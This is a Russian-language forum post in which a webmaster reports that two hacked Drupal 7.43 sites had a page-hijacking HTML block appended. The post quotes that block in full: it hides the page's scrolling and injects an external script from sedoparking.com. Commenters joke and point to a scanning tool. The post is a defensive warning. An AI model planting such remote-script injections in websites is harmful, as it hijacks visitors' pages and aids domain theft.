Взломали 2 сайта на Drupal 7 (sedoparking.com)

Вс, 26/03/2017 - 05:57

Хочу предупредить и сказать как решить проблему. Заметил случайно, пропал скролл в браузере под залогененным админом, прокрутить страницу вообще не вариант. Еще увеличились шрифты в админке.
Вчера взломали 2 сайта на Drupal 7.43 и вшили в конец кода такую галиматью:

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <style type="text/css">
    html, body, #partner, iframe {
      height: 100%;
      width: 100%;
      margin: 0;
      padding: 0;
      border: 0;
      outline: 0;
      font-size: 100%;
      vertical-align: baseline;
      background: transparent;
    }

    body {
      overflow: hidden;
    }
  </style>
  <meta content="NOW" name="expires">
  <meta content="index, follow, all" name="GOOGLEBOT">
  <meta content="index, follow, all" name="robots">
  <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->
  <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">
  <script type="text/javascript" src="punycode.min.js"></script>
</head>
<body>
<div id="partner"></div>
<script type="text/javascript">
  document.write(
    '<script type="text/javascript" language="JavaScript"'
   + 'src="//sedoparking.com/frmpark/'
   + punycode.toASCII(window.location.host) + '/'
   + 'dealrucenter'
   + '/park.js">
'
    + '<\/script>'
  );
</script>
</body>

Давно известная хрень, Так между прочим уводят домены. Оба домена скоро заканчиваются. Взломано было ядро. Просто обновляете ядро! Ссылки закодированы в base64. Всем добра!

1 Спасибо

Комментарии

Аватар пользователя Studio VIZA
1 month 1 день назад Studio VIZA #

Игорёк, при твоей то войне с корпорациями, два взлома это как данность, верно же?

1 Спасибо
Аватар пользователя Igumenus
1 month 1 день назад Igumenus #

Аххх))) ты прямо в точку! Корпорации они такие, зло держат на четких пацанчиков. Не нравятся им Робингуды, что тут поделаешь).

1 Спасибо
Аватар пользователя tobin
3 недели 5 часов назад tobin #

А можно подробнее про решение и саму проблему. Столкнулся неделю назад на сайте с wordpress. Поиском по коду ничего подозрительного найти не могу. Может остался исходник вредоносного кода, чтобы его поискать?

0 Спасибо
Аватар пользователя Van&#039;Denis
2 недели 6 дней назад Van'Denis #

Воспользуйтесь Unmask Parasites и внимательно изучите результаты.

0 Спасибо